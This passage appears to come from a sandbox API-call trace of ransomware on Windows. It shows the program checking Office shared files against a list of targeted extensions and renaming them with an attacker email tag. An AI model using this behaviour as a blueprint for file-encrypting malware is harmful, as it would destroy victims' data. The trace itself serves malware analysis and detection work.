Shared\\OFFICE14\\PRJRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\prjres.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\prjres.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0264.912] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL") returned 66 [0264.912] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL") returned 66 [0264.912] lstrlenW (lpString=".doc") returned 4 [0264.912] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0264.912] lstrlenW (lpString=".docx") returned 5 [0264.912] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0264.912] lstrlenW (lpString=".pdf") returned 4 [0264.912] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0264.912] lstrlenW (lpString=".xls") returned 4 [0264.912] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0264.912] lstrlenW (lpString=".xlsx") returned 5 [0264.912] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0264.912] lstrlenW (lpString=".ppt") returned 4 [0264.912] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0264.912] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL") returned 66 [0264.912] lstrlenW (lpString=".zip") returned 4 [0264.913] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0264.913] lstrlenW (lpString=".rar") returned 4 [0264.913] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0264.913] lstrlenW (lpString=".bz2") returned 4 [0264.913] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0264.913] lstrlenW (lpString=".7z") returned 3 [0264.913] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0264.913] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL") returned 66 [0264.913] lstrlenW (lpString=".dbf") returned 4 [0264.913] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0264.913] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL") returned 66 [0264.913] lstrlenW (lpString=".1cd") returned 4 [0264.913] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0264.913] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL") returned 66 [0264.913] lstrlenW (lpString=".jpg") returned 4 [0264.913] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0264.913] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL") returned 66 [0264.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL") returned 66 [0264.914] lstrlenW (lpString=".doc") returned 4 [0264.914] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0264.914] lstrlenW (lpString=".docx") returned 5 [0264.914] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0264.914] lstrlenW (lpString=".pdf") returned 4 [0264.914] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0264.914] lstrlenW (lpString=".xls") returned 4 [0264.914] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0264.914] lstrlenW (lpString=".xlsx") returned 5 [0264.914] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0264.914] lstrlenW (lpString=".ppt") returned 4 [0264.914] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0264.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL") returned 66 [0264.914] lstrlenW (lpString=".zip") returned 4 [0264.914] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0264.914] lstrlenW (lpString=".rar") returned 4 [0264.914] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0264.914] lstrlenW (lpString=".bz2") returned 4 [0264.914] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0264.914] lstrlenW (lpString=".7z") returned 3 [0264.914] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0264.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL") returned 66 [0264.914] lstrlenW (lpString=".dbf") returned 4 [0264.914] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0264.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL") returned 66 [0264.914] lstrlenW (lpString=".1cd") returned 4 [0264.914] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0264.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL") returned 66 [0264.915] lstrlenW (lpString=".jpg") returned 4 [0264.915] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0264.915] lstrcmpiW (lpString1=".ELM", lpString2=".USA") returned -1 [0264.915] lstrlenW (lpString="BREEZE.ELM") returned 10 [0264.915] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\breeze.elm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0265.010] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=107831) returned 1 [0265.010] CloseHandle (hObject=0x380) returned 1 [0265.010] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\breeze.elm")) returned 0x20 [0265.010] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\breeze.elm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.010] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\breeze.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.010] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM") returned 73 [0265.010] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM") returned 73 [0265.010] lstrlenW (lpString=".doc") returned 4 [0265.010] lstrcmpiW (lpString1=".doc", lpString2=".ELM") returned -1 [0265.010] lstrlenW (lpString=".docx") returned 5 [0265.010] lstrcmpiW (lpString1=".docx", lpString2="E.ELM") returned -1 [0265.010] lstrlenW (lpString=".pdf") returned 4 [0265.010] lstrcmpiW (lpString1=".pdf", lpString2=".ELM") returned 1 [0265.010] lstrlenW (lpString=".xls") returned 4 [0265.010] lstrcmpiW (lpString1=".xls", lpString2=".ELM") returned 1 [0265.010] lstrlenW (lpString=".xlsx") returned 5 [0265.011] lstrcmpiW (lpString1=".xlsx", lpString2="E.ELM") returned -1 [0265.011] lstrlenW (lpString=".ppt") returned 4 [0265.011] lstrcmpiW (lpString1=".ppt", lpString2=".ELM") returned 1 [0265.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM") returned 73 [0265.011] lstrlenW (lpString=".zip") returned 4 [0265.011] lstrcmpiW (lpString1=".zip", lpString2=".ELM") returned 1 [0265.011] lstrlenW (lpString=".rar") returned 4 [0265.011] lstrcmpiW (lpString1=".rar", lpString2=".ELM") returned 1 [0265.011] lstrlenW (lpString=".bz2") returned 4 [0265.011] lstrcmpiW (lpString1=".bz2", lpString2=".ELM") returned -1 [0265.011] lstrlenW (lpString=".7z") returned 3 [0265.011] lstrcmpiW (lpString1=".7z", lpString2="ELM") returned -1 [0265.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM") returned 73 [0265.011] lstrlenW (lpString=".dbf") returned 4 [0265.011] lstrcmpiW (lpString1=".dbf", lpString2=".ELM") returned -1 [0265.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM") returned 73 [0265.011] lstrlenW (lpString=".1cd") returned 4 [0265.011] lstrcmpiW (lpString1=".1cd", lpString2=".ELM") returned -1 [0265.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM") returned 73 [0265.011] lstrlenW (lpString=".jpg") returned 4 [0265.011] lstrcmpiW (lpString1=".jpg", lpString2=".ELM") returned 1 [0265.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM") returned 73 [0265.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM") returned 73 [0265.011] lstrlenW (lpString=".doc") returned 4 [0265.011] lstrcmpiW (lpString1=".doc", lpString2=".ELM") returned -1 [0265.011] lstrlenW (lpString=".docx") returned 5 [0265.011] lstrcmpiW (lpString1=".docx", lpString2="E.ELM") returned -1 [0265.011] lstrlenW (lpString=".pdf") returned 4 [0265.011] lstrcmpiW (lpString1=".pdf", lpString2=".ELM") returned 1 [0265.012] lstrlenW (lpString=".xls") returned 4 [0265.012] lstrcmpiW (lpString1=".xls", lpString2=".ELM") returned 1 [0265.012] lstrlenW (lpString=".xlsx") returned 5 [0265.012] lstrcmpiW (lpString1=".xlsx", lpString2="E.ELM") returned -1 [0265.012] lstrlenW (lpString=".ppt") returned 4 [0265.012] lstrcmpiW (lpString1=".ppt", lpString2=".ELM") returned 1 [0265.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM") returned 73 [0265.012] lstrlenW (lpString=".zip") returned 4 [0265.012] lstrcmpiW (lpString1=".zip", lpString2=".ELM") returned 1 [0265.012] lstrlenW (lpString=".rar") returned 4 [0265.012] lstrcmpiW (lpString1=".rar", lpString2=".ELM") returned 1 [0265.012] lstrlenW (lpString=".bz2") returned 4 [0265.012] lstrcmpiW (lpString1=".bz2", lpString2=".ELM") returned -1 [0265.012] lstrlenW (lpString=".7z") returned 3 [0265.012] lstrcmpiW (lpString1=".7z", lpString2="ELM") returned -1 [0265.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM") returned 73 [0265.012] lstrlenW (lpString=".dbf") returned 4 [0265.012] lstrcmpiW (lpString1=".dbf", lpString2=".ELM") returned -1 [0265.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM") returned 73 [0265.012] lstrlenW (lpString=".1cd") returned 4 [0265.012] lstrcmpiW (lpString1=".1cd", lpString2=".ELM") returned -1 [0265.012] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM") returned 73 [0265.012] lstrlenW (lpString=".jpg") returned 4 [0265.012] lstrcmpiW (lpString1=".jpg", lpString2=".ELM") returned 1 [0265.012] lstrcmpiW (lpString1=".INF", lpString2=".USA") returned -1 [0265.013] lstrlenW (lpString="JOURNAL.INF") returned 11 [0265.013] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\journal.inf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0265.014] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=499) returned 1 [0265.015] CloseHandle (hObject=0x380) returned 1 [0265.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\journal.inf")) returned 0x20 [0265.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\journal.inf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.015] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\journal.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF") returned 75 [0265.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF") returned 75 [0265.015] lstrlenW (lpString=".doc") returned 4 [0265.015] lstrcmpiW (lpString1=".doc", lpString2=".INF") returned -1 [0265.015] lstrlenW (lpString=".docx") returned 5 [0265.015] lstrcmpiW (lpString1=".docx", lpString2="L.INF") returned -1 [0265.015] lstrlenW (lpString=".pdf") returned 4 [0265.015] lstrcmpiW (lpString1=".pdf", lpString2=".INF") returned 1 [0265.015] lstrlenW (lpString=".xls") returned 4 [0265.015] lstrcmpiW (lpString1=".xls", lpString2=".INF") returned 1 [0265.015] lstrlenW (lpString=".xlsx") returned 5 [0265.015] lstrcmpiW (lpString1=".xlsx", lpString2="L.INF") returned -1 [0265.015] lstrlenW (lpString=".ppt") returned 4 [0265.015] lstrcmpiW (lpString1=".ppt", lpString2=".INF") returned 1 [0265.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF") returned 75 [0265.015] lstrlenW (lpString=".zip") returned 4 [0265.015] lstrcmpiW (lpString1=".zip", lpString2=".INF") returned 1 [0265.015] lstrlenW (lpString=".rar") returned 4 [0265.015] lstrcmpiW (lpString1=".rar", lpString2=".INF") returned 1 [0265.016] lstrlenW (lpString=".bz2") returned 4 [0265.016] lstrcmpiW (lpString1=".bz2", lpString2=".INF") returned -1 [0265.016] lstrlenW (lpString=".7z") returned 3 [0265.016] lstrcmpiW (lpString1=".7z", lpString2="INF") returned -1 [0265.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF") returned 75 [0265.016] lstrlenW (lpString=".dbf") returned 4 [0265.016] lstrcmpiW (lpString1=".dbf", lpString2=".INF") returned -1 [0265.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF") returned 75 [0265.016] lstrlenW (lpString=".1cd") returned 4 [0265.016] lstrcmpiW (lpString1=".1cd", lpString2=".INF") returned -1 [0265.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF") returned 75 [0265.016] lstrlenW (lpString=".jpg") returned 4 [0265.016] lstrcmpiW (lpString1=".jpg", lpString2=".INF") returned 1 [0265.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF") returned 75 [0265.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF") returned 75 [0265.016] lstrlenW (lpString=".doc") returned 4 [0265.016] lstrcmpiW (lpString1=".doc", lpString2=".INF") returned -1 [0265.016] lstrlenW (lpString=".docx") returned 5 [0265.016] lstrcmpiW (lpString1=".docx", lpString2="L.INF") returned -1 [0265.016] lstrlenW (lpString=".pdf") returned 4 [0265.016] lstrcmpiW (lpString1=".pdf", lpString2=".INF") returned 1 [0265.016] lstrlenW (lpString=".xls") returned 4 [0265.016] lstrcmpiW (lpString1=".xls", lpString2=".INF") returned 1 [0265.016] lstrlenW (lpString=".xlsx") returned 5 [0265.016] lstrcmpiW (lpString1=".xlsx", lpString2="L.INF") returned -1 [0265.016] lstrlenW (lpString=".ppt") returned 4 [0265.016] lstrcmpiW (lpString1=".ppt", lpString2=".INF") returned 1 [0265.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF") returned 75 [0265.016] lstrlenW (lpString=".zip") returned 4 [0265.017] lstrcmpiW (lpString1=".zip", lpString2=".INF") returned 1 [0265.017] lstrlenW (lpString=".rar") returned 4 [0265.017] lstrcmpiW (lpString1=".rar", lpString2=".INF") returned 1 [0265.017] lstrlenW (lpString=".bz2") returned 4 [0265.017] lstrcmpiW (lpString1=".bz2", lpString2=".INF") returned -1 [0265.017] lstrlenW (lpString=".7z") returned 3 [0265.017] lstrcmpiW (lpString1=".7z", lpString2="INF") returned -1 [0265.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF") returned 75 [0265.017] lstrlenW (lpString=".dbf") returned 4 [0265.017] lstrcmpiW (lpString1=".dbf", lpString2=".INF") returned -1 [0265.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF") returned 75 [0265.017] lstrlenW (lpString=".1cd") returned 4 [0265.017] lstrcmpiW (lpString1=".1cd", lpString2=".INF") returned -1 [0265.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF") returned 75 [0265.017] lstrlenW (lpString=".jpg") returned 4 [0265.017] lstrcmpiW (lpString1=".jpg", lpString2=".INF") returned 1 [0265.017] lstrcmpiW (lpString1=".ELM", lpString2=".USA") returned -1 [0265.017] lstrlenW (lpString="LEVEL.ELM") returned 9 [0265.017] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\level.elm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0265.019] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=58092) returned 1 [0265.019] CloseHandle (hObject=0x380) returned 1 [0265.019] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\level.elm")) returned 0x20 [0265.019] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\level.elm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.019] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\level.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM") returned 71 [0265.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM") returned 71 [0265.019] lstrlenW (lpString=".doc") returned 4 [0265.019] lstrcmpiW (lpString1=".doc", lpString2=".ELM") returned -1 [0265.019] lstrlenW (lpString=".docx") returned 5 [0265.019] lstrcmpiW (lpString1=".docx", lpString2="L.ELM") returned -1 [0265.019] lstrlenW (lpString=".pdf") returned 4 [0265.019] lstrcmpiW (lpString1=".pdf", lpString2=".ELM") returned 1 [0265.019] lstrlenW (lpString=".xls") returned 4 [0265.019] lstrcmpiW (lpString1=".xls", lpString2=".ELM") returned 1 [0265.019] lstrlenW (lpString=".xlsx") returned 5 [0265.019] lstrcmpiW (lpString1=".xlsx", lpString2="L.ELM") returned -1 [0265.019] lstrlenW (lpString=".ppt") returned 4 [0265.019] lstrcmpiW (lpString1=".ppt", lpString2=".ELM") returned 1 [0265.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM") returned 71 [0265.019] lstrlenW (lpString=".zip") returned 4 [0265.019] lstrcmpiW (lpString1=".zip", lpString2=".ELM") returned 1 [0265.019] lstrlenW (lpString=".rar") returned 4 [0265.019] lstrcmpiW (lpString1=".rar", lpString2=".ELM") returned 1 [0265.020] lstrlenW (lpString=".bz2") returned 4 [0265.020] lstrcmpiW (lpString1=".bz2", lpString2=".ELM") returned -1 [0265.020] lstrlenW (lpString=".7z") returned 3 [0265.020] lstrcmpiW (lpString1=".7z", lpString2="ELM") returned -1 [0265.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM") returned 71 [0265.020] lstrlenW (lpString=".dbf") returned 4 [0265.020] lstrcmpiW (lpString1=".dbf", lpString2=".ELM") returned -1 [0265.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM") returned 71 [0265.020] lstrlenW (lpString=".1cd") returned 4 [0265.020] lstrcmpiW (lpString1=".1cd", lpString2=".ELM") returned -1 [0265.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM") returned 71 [0265.020] lstrlenW (lpString=".jpg") returned 4 [0265.020] lstrcmpiW (lpString1=".jpg", lpString2=".ELM") returned 1 [0265.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM") returned 71 [0265.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM") returned 71 [0265.020] lstrlenW (lpString=".doc") returned 4 [0265.020] lstrcmpiW (lpString1=".doc", lpString2=".ELM") returned -1 [0265.020] lstrlenW (lpString=".docx") returned 5 [0265.020] lstrcmpiW (lpString1=".docx", lpString2="L.ELM") returned -1 [0265.020] lstrlenW (lpString=".pdf") returned 4 [0265.020] lstrcmpiW (lpString1=".pdf", lpString2=".ELM") returned 1 [0265.020] lstrlenW (lpString=".xls") returned 4 [0265.020] lstrcmpiW (lpString1=".xls", lpString2=".ELM") returned 1 [0265.020] lstrlenW (lpString=".xlsx") returned 5 [0265.020] lstrcmpiW (lpString1=".xlsx", lpString2="L.ELM") returned -1 [0265.020] lstrlenW (lpString=".ppt") returned 4 [0265.020] lstrcmpiW (lpString1=".ppt", lpString2=".ELM") returned 1 [0265.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM") returned 71 [0265.020] lstrlenW (lpString=".zip") returned 4 [0265.021] lstrcmpiW (lpString1=".zip", lpString2=".ELM") returned 1 [0265.021] lstrlenW (lpString=".rar") returned 4 [0265.021] lstrcmpiW (lpString1=".rar", lpString2=".ELM") returned 1 [0265.021] lstrlenW (lpString=".bz2") returned 4 [0265.021] lstrcmpiW (lpString1=".bz2", lpString2=".ELM") returned -1 [0265.021] lstrlenW (lpString=".7z") returned 3 [0265.021] lstrcmpiW (lpString1=".7z", lpString2="ELM") returned -1 [0265.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM") returned 71 [0265.021] lstrlenW (lpString=".dbf") returned 4 [0265.021] lstrcmpiW (lpString1=".dbf", lpString2=".ELM") returned -1 [0265.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM") returned 71 [0265.021] lstrlenW (lpString=".1cd") returned 4 [0265.021] lstrcmpiW (lpString1=".1cd", lpString2=".ELM") returned -1 [0265.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM") returned 71 [0265.021] lstrlenW (lpString=".jpg") returned 4 [0265.021] lstrcmpiW (lpString1=".jpg", lpString2=".ELM") returned 1 [0265.021] lstrcmpiW (lpString1=".INF", lpString2=".USA") returned -1 [0265.021] lstrlenW (lpString="LEVEL.INF") returned 9 [0265.021] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\level.inf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0265.021] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=526) returned 1 [0265.021] CloseHandle (hObject=0x380) returned 1 [0265.022] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\level.inf")) returned 0x20 [0265.022] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\level.inf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.022] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\level.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF") returned 71 [0265.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF") returned 71 [0265.022] lstrlenW (lpString=".doc") returned 4 [0265.022] lstrcmpiW (lpString1=".doc", lpString2=".INF") returned -1 [0265.022] lstrlenW (lpString=".docx") returned 5 [0265.022] lstrcmpiW (lpString1=".docx", lpString2="L.INF") returned -1 [0265.022] lstrlenW (lpString=".pdf") returned 4 [0265.022] lstrcmpiW (lpString1=".pdf", lpString2=".INF") returned 1 [0265.022] lstrlenW (lpString=".xls") returned 4 [0265.022] lstrcmpiW (lpString1=".xls", lpString2=".INF") returned 1 [0265.022] lstrlenW (lpString=".xlsx") returned 5 [0265.022] lstrcmpiW (lpString1=".xlsx", lpString2="L.INF") returned -1 [0265.022] lstrlenW (lpString=".ppt") returned 4 [0265.022] lstrcmpiW (lpString1=".ppt", lpString2=".INF") returned 1 [0265.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF") returned 71 [0265.022] lstrlenW (lpString=".zip") returned 4 [0265.022] lstrcmpiW (lpString1=".zip", lpString2=".INF") returned 1 [0265.022] lstrlenW (lpString=".rar") returned 4 [0265.022] lstrcmpiW (lpString1=".rar", lpString2=".INF") returned 1 [0265.022] lstrlenW (lpString=".bz2") returned 4 [0265.022] lstrcmpiW (lpString1=".bz2", lpString2=".INF") returned -1 [0265.022] lstrlenW (lpString=".7z") returned 3 [0265.022] lstrcmpiW (lpString1=".7z", lpString2="INF") returned -1 [0265.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF") returned 71 [0265.023] lstrlenW (lpString=".dbf") returned 4 [0265.023] lstrcmpiW (lpString1=".dbf", lpString2=".INF") returned -1 [0265.023] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 